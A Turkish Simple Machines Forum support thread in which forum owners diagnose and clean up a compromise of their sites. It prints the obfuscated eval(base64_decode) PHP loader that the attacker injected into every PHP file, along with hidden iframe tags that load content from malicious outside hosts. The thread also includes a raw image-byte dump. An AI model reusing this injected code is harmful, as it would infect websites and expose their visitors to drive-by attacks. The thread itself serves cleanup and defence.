Simple Machines Community Forum

Merhaba Arkadaşlar 1.1.9'u Paket Olarak Kurdum Fakat;

Profil -> Temalar ve Görünüm Sonrasında Temayı Değiştire Tıkladığımda Aşağıdaki Hatayı Alıyorum.

ÿØÿá�¼Exif��II*�����
�
���
���1
����J���2
����f����
���
���i��
���z�������ACD Systems Digital Imaging�2008:11:22 03:08:16��������0220������515� �
���
��� �
���
����������ÿş'00ÿÛ�C�
     ÿÛ�C
  ÿÀ��
�

!�

ÿÄ���






��������
 ÿÄ�µ�
��
}
�!1AQa"q2��¡#B±ÁRÑğ$3br� %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�����������������¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖ×ØÙÚáâãäåæçèéêñòóôõö÷øùúÿÄ�
�








������
 ÿÄ�µ�
�
w�
!1AQaq"2�B�¡±Á #3RğbrÑ $4á%ñ&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������¢£¤¥¦§¨©ª²³´µ¶·¸¹ºÂÃÄÅÆÇÈÉÊÒÓÔÕÖ×ØÙÚâãäåæçèéêòóôõö÷øùúÿÚ�
��?�ıS¢�?ÿÙ


3 tane sitemde paket olarak yükledim 3 ündede aynı hatayı aldım.. Bi Bakın Sizdede Aynı Hatayı Veriyormu.. Anlayamadım 1.1.9 açık mı kapatıyuo yoksa açık mı yaratıyor  :D

Firefox'ta sorun yok...

İe 8'de de sorun yok...

Lainaus käyttäjältä: SA(^_^)Mi - toukokuu 24, 2009, 08:27:41 AP
Merhaba Arkadaşlar 1.1.9'u Paket Olarak Kurdum Fakat;

Profil -> Temalar ve Görünüm Sonrasında Temayı Değiştire Tıkladığımda Aşağıdaki Hatayı Alıyorum.


3 tane sitemde paket olarak yükledim 3 ündede aynı hatayı aldım.. Bi Bakın Sizdede Aynı Hatayı Veriyormu.. Anlayamadım 1.1.9 açık mı kapatıyuo yoksa açık mı yaratıyor  :D

Hocam sizin bilgisayarda virüs var sanırım ve 3 sitenin de index dosyalarından birine bulaşmış ftp açık olduğu için. ;)
1.1.9 açık kapatmak için tabiki ama sizde bir sorun var yani. index dosyalarında bunları arayıp silmeniz lazım.  ;)

Lainaus käyttäjältä: turklerinneti.com - toukokuu 24, 2009, 08:22:09 IP

Lainaus käyttäjältä: SA(^_^)Mi - toukokuu 24, 2009, 08:27:41 AP
Merhaba Arkadaşlar 1.1.9'u Paket Olarak Kurdum Fakat;

Profil -> Temalar ve Görünüm Sonrasında Temayı Değiştire Tıkladığımda Aşağıdaki Hatayı Alıyorum.


3 tane sitemde paket olarak yükledim 3 ündede aynı hatayı aldım.. Bi Bakın Sizdede Aynı Hatayı Veriyormu.. Anlayamadım 1.1.9 açık mı kapatıyuo yoksa açık mı yaratıyor  :D

Hocam sizin bilgisayarda virüs var sanırım ve 3 sitenin de index dosyalarından birine bulaşmış ftp açık olduğu için. ;)
1.1.9 açık kapatmak için tabiki ama sizde bir sorun var yani. index dosyalarında bunları arayıp silmeniz lazım.  ;)

Virüs mü? valla bende hiç bir uyarı falan vermedi, gerçi farklı korumalar kullanıyoruz olabilir.

Aktif etmeye çalıştığın temada virüs kodları var.

Tam olarak değil. Siz güncellemeden önce forumunuzda "hack" girişimi olmuş.

Bu sorguyu phpMyAdmin'den çalıştırın:

SELECT *
FROM smf_themes
WHERE ID_THEME = 32

Çıkan sonuçta ID_MEMBER sütunundaki üye idlerini yasaklayın.

value sütunundaki şu şekilde bir veri göreceksiniz: ./attachments/avatar_***.gif. O dosyaların hepsini attachment dizininden silin.

Son olarak da ilk çalıştırdığınız sorgu ile çıkan sonuçları silin.

Sinan hocam bunlar değerli bilgiler.  Şimdi bana da geçen gün böyle bir saldırı oldu sanırım ve ancak hosting düzeltebildi gece. Forum yavaş yavaş yok oldu. Ben şimdi şunları sormak istiyorum ;

1- Bu kodlar hangi dosyalara bulaşıyor bu tür saldırı durumunda.

2- Bu saldırıları önlemek için bizim yada hosting şirketinin yapabileceği bişey varmıdır ?

3- Bunu yapanın ip numarasını (saatini tahmin edebilirsek) nasıl bulabiliriz ?

4- Siteye ne tür saldırı yöntemleriyle saldırı olur ? Mesela virüs bulaştırma, sürekli bir saldırıyla trafik alanını bitirme vb.gibi. Bunlar benim tahminlerim.
Çünkü diğer arkadaşlar da burada zaman zaman bu tür saldırılara uğradıkları için yazıyor ve bence bilgi sahibi olmayı herkes ister sanırım. ;)
Bu konularda bizi biraz aydınlatabilirseniz çok memnun oluruz. Teşekkürler.

Sorguyu çalıştırdım. karşıma 1 Sonuç Çıktı. O üyeyi Buldum Yasakladım Avatar yükleyememş sanırsam çünki attachments içinde avatarını bulamadım. Ki Zaten

Forumu 1.1.9 ile sıfırdan kurmuştum hatayı gideremeyince. Diğer sitenin TÜM .php dosyalarında
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9nb3R1cmtleS9wdWJsaWNfaHRtbC9vbmtpc2kuY29tL1RoZW1lcy9TYXRlbGxpdGUvaW1hZ2VzL2J1dHRvbnMvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL2dvdHVya2V5L3B1YmxpY19odG1sL29ua2lzaS5jb20vVGhlbWVzL1NhdGVsbGl0ZS9pbWFnZXMvYnV0dG9ucy9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>


bu kodu buldum hepsini tektek silmekle uğraşmak yerine 1.1.9 U sıfırdan kuracağım birazdan daha güvenli olur.

Birde bu siteler farklı farklı hostlarda bu beni bilerek mi yapıyor anlamış değilim :S
Nasıl giripte kaynak kodlarına kadar base64 kodu yerleştirdi onuda anlamadım adamın siteye üye olası ile çıkması bir olmuş zaten. Amacı Neyse artık  :-\

http://www.smf.pl/forum/index.php?topic=4857.0

burdaki adamada aynı ip den aynı kişi aynı şekilde aynı kodu eklemiş :S

Bundan Sonra Ne Yapamam Gerekiyor  ???


edit: Resim ekledim. Bu Sanırım Bot. her 2 sitede'de aynı üye adı adı IP ve maile sahip.

Evet, o :) O üyenin IP'sini banlayıp silin.

tamamen banladım silmeye gerek yok ta bu adımdan sonra bişey yapmam gerekmiyor sanırım ?

Eğer dosyaları temizlediyseniz, hayır.

Sinan Hocamın Deikleri İle birlikte tüm dosyalarıda temizledim Bu arada Yorum, Görüş ve önerilerde Bulunan arkadaşlara teşekkür ederim Sinan Hocama Ayriyeten Teşekkürler..

Stop forum spam modu kurulu olsaydı bu üye olamazdı, çünkü e-maili  stopforumspam.com sitesinde kayıtlı. ;)

ya zaten botlar gelip duruyodu güvenli resim doğrulaması koydum bot kayıt olamamaya başladı sonra güvenliği kaldırdım olan oldu işte : ) Hayırlısı Bakalım

Bende Stop forum spam modu kurulu. O zaman korkmama gerek yok sanırım. Çünkü bugün dikkat ettim hiç yabancı üye yok gelmemiş kimse  ;)

Lainaa1- Bu kodlar hangi dosyalara bulaşıyor bu tür saldırı durumunda.

Her dosyanıza bulaşmış olabilir. Bütün dosyalarınızı yenilemenizi tavsiye ederim. 1.1.9 ve 2.0 RC1-1 sürümleriyle bunların hepsine karşı önlem alınmış oldu.

Lainaa2- Bu saldırıları önlemek için bizim yada hosting şirketinin yapabileceği bişey varmıdır ?

Sisteminizi güncel tutmak. En yeni sürümlere güncelleme fırsatı bulamayanlar için avatar ve eklenti sistemini 1.1.9 ve 2.0 RC1-1 sürümüne güncelleyene kadar kapalı duruma getirmek. Güncellediyseniz sorun yok.

Lainaa3- Bunu yapanın ip numarasını (saatini tahmin edebilirsek) nasıl bulabiliriz ?

Sunucu erişim kayıtlarında (access logs) arayabilirsiniz ama çok zaman geçtiyse bulmanız biraz zor olabilir.

Lainaa4- Siteye ne tür saldırı yöntemleriyle saldırı olur ? Mesela virüs bulaştırma, sürekli bir saldırıyla trafik alanını bitirme vb.gibi. Bunlar benim tahminlerim.

Her türlü saldırı olabilir. Sitenize virüs bulaşması sizinle alakalı birşey. Yani bilgisayarınıza bulaştıysa, siz onu sitenize de bulaştırıyorsunuz. Bunun dışında genelde saldırılar daha çok hostunuzu ilgilendirecek alanlarda olur. SMF'i ilgilendiren bir açık mevzuu bahis olduğunda en kısa zamanda güncellemeler yayınlanıyor zaten. Yani dediğim gibi, sisteminizi güncel tutmalısınız.

----

Ayrıca sitesine krisbarteo üye olan arkadaşlara tavsiyem dosyalarının temiz olduğunu kontrol etmeleri. Kendisi bir süredir SMF forumlarını hedef alan saldırılar düzenliyor ve son sürümlere güncellemeden önce size de uğradıysa dosyalarınızda istemeyeceğiniz kodlar eklenmiş olabilir.

Sinan hocam verdiğiniz bilgiler için çok teşekkürler. 1.1.9 sürümüne güncellemiş durumdayım zaten inşallah böyle bişey tekrar olmaz ama olduğunda da virüs kodlarını öncelikle index dosyalarında aramamız gerekiyor sanırım ?
index.php , index.htm , index.html , bordindex.php , Bordindex.template.php  vs. gibi.

Virüs sorununu bizzat yaşamadığım için o konuda net bir bilgim yok. Ama ben bu durumda olsaydım hiçbir dosyama güvenmezdim. ;)

Doğru sözlüyorsunuz ama kurulu o kadar çok mod varki  :D Hepsini yenileyip geri kurmam en az bir ayımı alır benim.  :)
Dosyayı antivirüs ile taratınca bunları silmez mi yoksa manuel olarak dosyanın içinde kendimiz mi arayıp bulmamız lazım bu değişik olan karekterleri yani virüs kodlarını ?

SA(^_^)Mi'nin bahsettiği kodlar krisbarteo'nun işi. Bu kodları temizlemek için şuradaki aracı kullanabilirsiniz:

http://www.simplemachines.org/community/index.php?topic=313201.0

Fakat her dosyaya 'iframe' kodları ekleyen virüsden bashediyosanız, dediğim gibi onun hakkında fazla bir bilgim yok.

Çok sağolun. ;)
Bu ekteki dosyayı anadizine atıp çalıştırmamız gerekiyor galiba  ???

Evet, ama tekrar buraya eklemenize gerek yok. :)

Tamam sağolun. Orda bir link vardı bu şekilde ; You can find the updates at http://download.simplemachines.org/
ordan kafam karıştı ingilizce olduğu için belki başkadır diye emin olmak için sormuştum. ;)
Bunu çalıştırdıktan sonra anadizinden yine siliyoruz sanırım. Bunu yapıcam şimdi.

Verdiği hata bu ; Error: Cannot run - please verify you put this in the same place as SMF's index.php and SSI.php files.

SSI.php ile aynı dizine koyduğunuzdan emin olun.

Şimdi doğru yerde çalıştırdım ve en üstte bu şekilde yazıyor ; Warning: set_time_limit() [function.set-time-limit]: Cannot set time limit in safe mode in /var/www/vhosts/turklerinneti.com/httpdocs/forum/kb_scan.php on line 41

Ama tüm dosyaları sıraladığında hiçbirinde bişey göstermedi hepsini yeşil olarak sıraladı. Demekki bişey bulmadı yada üstteki yazı hatamıdır  ???

Hayır, o bir sorun değil. Yeşil olarak sıralandıysa her şey normal demektir.

Lainaus käyttäjältä: [SiNaN] - toukokuu 26, 2009, 06:00:51 AP
Hayır, o bir sorun değil. Yeşil olarak sıralandıysa her şey normal demektir.

Tamam. Yardımlarınız için çok sağolun teşekkürler. ;)

Lainaus käyttäjältä: [SiNaN] - toukokuu 26, 2009, 05:11:48 AP
SA(^_^)Mi'nin bahsettiği kodlar krisbarteo'nun işi. Bu kodları temizlemek için şuradaki aracı kullanabilirsiniz:

http://www.simplemachines.org/community/index.php?topic=313201.0

Fakat her dosyaya 'iframe' kodları ekleyen virüsden bashediyosanız, dediğim gibi onun hakkında fazla bir bilgim yok.

her dosya demeyelimde her php uzantılı sayfalara diyelim.. Siz Virüsten bahsetmeden Önce Kodlardan Haberim Yoktu Sonra İncelediğimde TÜM PHP sayfaların (Sources Klasöründekilere Bile) En Üstüne Verdiğim Kodu Eklemiş. Şuan 1 Sitemi Tamamen Sıfırdın Kurdum Diğerinide En kısa Sürede Silip Sıfırdan Kuracağım.

Lainaus käyttäjältä: SA(^_^)Mi - toukokuu 26, 2009, 04:26:41 IP

Lainaus käyttäjältä: [SiNaN] - toukokuu 26, 2009, 05:11:48 AP
SA(^_^)Mi'nin bahsettiği kodlar krisbarteo'nun işi. Bu kodları temizlemek için şuradaki aracı kullanabilirsiniz:

http://www.simplemachines.org/community/index.php?topic=313201.0

Fakat her dosyaya 'iframe' kodları ekleyen virüsden bashediyosanız, dediğim gibi onun hakkında fazla bir bilgim yok.

her dosya demeyelimde her php uzantılı sayfalara diyelim.. Siz Virüsten bahsetmeden Önce Kodlardan Haberim Yoktu Sonra İncelediğimde TÜM PHP sayfaların (Sources Klasöründekilere Bile) En Üstüne Verdiğim Kodu Eklemiş. Şuan 1 Sitemi Tamamen Sıfırdın Kurdum Diğerinide En kısa Sürede Silip Sıfırdan Kuracağım.

Sinan'ın verdiği dosyayı çalıştırınca "click here" yazan bir link var. Ona tıklarsanız dosya kendi temizlemeye çalışacaktır(yedek almayı unutmayın!).

Lainaus käyttäjältä: Yağız... - toukokuu 26, 2009, 04:38:20 IP

Sinan'ın verdiği dosyayı çalıştırınca "click here" yazan bir link var. Ona tıklarsanız dosya kendi temizlemeye çalışacaktır(yedek almayı unutmayın!).
[/quote]

Hemen İndirip Deneyeceğim. Yedek almama Gerek Yok Olmasa Dahi Sıfır 1.1.9 kurulumu yapacağım en sağlıklısı Die Düşünüyorum : )

edit:

Sadece Sayfada Bu Uyarıyı Aldım. :S

Admin privileges required.

Sitenize admin olarak giriş yapıp tekrar deneyin.

Sanırım Oldu : ) Teşekkür Ederim 2 tane Silemedi Onlarıda Bi Zahmet Ben Siliverdim.

slmlar
taramada böyle bir hata var en yukarida
Warning: set_time_limit() [function.set-time-limit]: Cannot set time limit in safe mode in /customers/turkfeed.com/turkfeed.com/httpd.www/forum/kb_scan.php on line 41

bu ne anlama geliyor acaba?bu krisbarteo banada gelmisti

O hatayı görmezden gelebilirsiniz. Dosyadaki ufak bir hatadan kaynaklanıyor.

krisbarteo disinda birde su 207.46.164.13 ve 207.46.164.14 yasakli listenize alin.bu IP de veritabanini yedeklemeye calisiyordu ama giremedi :D

Arkadaşlar bu virüs veya hack girişimi her neyse benim başımı epey ağrıttı. http://www.simplemachines.org/community/index.php?topic=307353.0 linkinde de konu ile ilgili resimleri de paylaşmıştım. Bahsi geçen bu kod FTP de boş dahi olsa kaç tane php dosyası varsa istisnasız hepsine bulaşıyor. 1.1.9 un bu açığı gidereceği söyleniyor. İnşallah öyle olur. Bu kod ile ilgili çok ilginç bir detay paylaşmak istiyorum.

Bu saldırı siteme 20 gün araylı iki kez yapıldı. Her ikisinde de siteme a.d.u.l.t içerik ekleyen iki üyeyi(sanırım ikiside bot tu.) banlamış hemen ardından "sen insan mısın?" modunu kurmuştum. Belki tesadüf diyeceksiniz ama asıl anlatacağım çok ilginç detay şu; ikinci saldırıdan sonra forumu yedekten kurdum ve ftp yi konple yeniden kurdum. Aynı gün 1.1.9 a güncelledim.(21.05.2009 da) Sonra bir konu için başka bir siteye üye olmam gerekiyordu. Üyelik kaydında e-mail bölümüne tıkladığım zaman şok geçirdim. Sitemde banladığım 2 üyenin mail numarası benim bilgisayarımdan girilmiş. Aşağıya resmini de koydum. SMF ustalarım daha iyi bilirler ama bu banladığım kişiler veya botla tarafından bu saldırının yapıldığını düşünüyorum. Nasıl oluyor da benim bilgisayarımdan üye oluyorlar anlamadım. Bahsettiğim üyelere ait mail ler sadece firefox da çıkıyor ie7 de çıkmıyor. O an firefox kullanıyormuşum demek ki. Bilgisayarımdan FTP ye veya admin girişimden admin paneline giriş yapmışlar.

<iframe src="http://bestnameshop.cn:8080/ts/in.cgi?pepsi30" width=125 height=125 style="visibility: hidden"></iframe>

echo "<iframe src=\"http://beidzan.com/?click=5DD50E\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

Şimdide Bunlar Çıktı :S  isminde index geçen tüm php dosyalarında vardı temizledim ftp şifresini değiştirdim şuan bişey yok ama bunlar nerden geliyor nasıl giriyor bi türelü anlamış değilim :S